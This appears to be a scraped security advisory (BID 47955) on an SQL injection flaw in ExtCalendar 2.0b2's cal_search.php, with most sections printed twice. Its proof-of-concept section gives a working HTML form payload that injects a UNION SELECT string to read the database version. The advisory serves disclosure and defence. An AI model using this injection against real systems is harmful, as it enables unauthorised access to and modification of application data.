ExtCalendar 'cal_search.php' SQL Injection Vulnerability
BID:47955
Info
ExtCalendar 'cal_search.php' SQL Injection Vulnerability
| Bugtraq ID: | 47955 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 24 2011 12:00AM |
| Updated: | May 24 2011 12:00AM |
| Credit: | High-Tech Bridge SA |
| Vulnerable: |
ExtCalendar ExtCalendar 2.0b2 |
| Not Vulnerable: | |
Discussion
ExtCalendar 'cal_search.php' SQL Injection Vulnerability
ExtCalendar is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
ExtCalendar 2.0b2 is vulnerable; other versions may also be affected.
ExtCalendar is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
ExtCalendar 2.0b2 is vulnerable; other versions may also be affected.
Exploit / POC
ExtCalendar 'cal_search.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
<form action="http://www.example.com/cal_search.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="search" value="') union select 1,version(),3,4,5,6,7,8,9,10 -- ">
<input type="submit" value="OK">
Attackers can use a browser to exploit this issue.
The following example URI is available:
<form action="http://www.example.com/cal_search.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="search" value="') union select 1,version(),3,4,5,6,7,8,9,10 -- ">
<input type="submit" value="OK">
Solution / Fix
ExtCalendar 'cal_search.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ExtCalendar 'cal_search.php' SQL Injection Vulnerability
References:
References:
- ExtCalendar Homepage (ExtCalendar)